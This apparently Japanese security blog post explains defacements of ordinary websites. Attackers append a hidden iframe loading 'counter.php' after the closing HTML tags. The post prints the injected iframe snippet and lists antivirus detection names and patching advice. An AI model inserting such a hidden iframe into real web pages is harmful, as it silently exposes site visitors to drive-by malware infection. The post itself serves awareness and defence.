counter.php改ざん被害 不正なiframeタグでウイルスサイト読み込み
 
何ら危険性の欠片もない 企業や個人などが管理してる普通の一般サイト が結構な数でハッキングされてる事例を確認してます。
 
イメージ 4
某大学のサイト
 
イメージ 3
某美容クリニックの企業サイト
 
この改ざん被害の特徴は、HTMLソースコードの最後尾付近にある </body>タグ と </html>タグ の直後に 不正な<iframe>タグ が挿入されます。 <アクセスしてきたユーザーに気づかれずにウイルスサイトを読み込む
</body>
</html><iframe src="http://[改ざんされてる正規サイトのドメイン]/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
挿入される不正な<iframe>タグは次のような感じになっており、ファイル名「counter.php」を読み込む処理だけど決して アクセス解析やカウンター用のタグではない から注意! <攻撃者側の偽装
 
イメージ 1
 
このiframeタグは10x10の極小サイズで表示され、CSS(スタイルシート)の指定によって実際の表示が隠されていて、アクセスするユーザーにバレることなくブラウザ内部で不正な処理を読み込まされます。
 
改ざん原因は?
 
PHPなど CGI が使用できない無料ホームページで改ざん事例が確認できるので、サイト運営者が使う Windowsパソコン が ウイルス感染 してパスワードが外部に流出してる恐れも?
 
・ WordPressなどサーバー上のCMSのWebアプリの脆弱性を突かれた?

セキュリティ会社の情報やウイルス検出名

セキュリティ機関でも「counter.php」の改ざんのお話は登場してます。
 
イメージ 2
「止まらない!ウェブ改ざんの実態と対策」
2013年8月 JPCERTコーディネーションセンター
(PDFファイルの7ページから引用)
 
終わらないWebサイトの改ざん―counter.phpと*stats.php | Kaspersky Daily - カスペルスキー公式ブログ
https://blog.kaspersky.co.jp/never-ending-web-compromise/2308/
 
この不正なIframeタグが挿入されたページを閲覧した時に警告するであろう有名セキュリティソフトのウイルス検出名はこんな感じ。
 
【不正なcounter.php改ざんのウイルス検出名】
avast! HTML:Iframe-ZG
AVG HTML/Framer
Avira HTML/Infected.WebPage.Gen3
Kaspersky Trojan.JS.Iframe.aeq HEUR:Trojan.Script.Generic
McAfee JS/Iframe.gen.ao
Microsoft Exploit:HTML/IframeRef.EX Exploit:HTML/IframeRef.gen
Sophos Mal/Iframe-AP

この不正なタグの影響を回避する対策は?

攻撃ターゲットは Windowsパソコン だけです。

  1. Adobe Flash Player は最新版に更新する
  2. Windows Update を実施する
  3. Java を最新版に更新する、必要ないなら削除する
  4. Adobe Reader を最新版に更新する
ちなみに、有名セキュリティソフト が導入したところで、肝心の ウイルス感染経路 は開いたままなら被害に巻き込まれうるので危険ヤバイッ!
 
× 危険なサイトに行かない!
× 怪しいリンクをクリックしない!
 
といった似非ウイルス対策は 現実の脅威とズレていて必ずしも役に立つとは言い難い から忘れましょう。
関連するブログ記事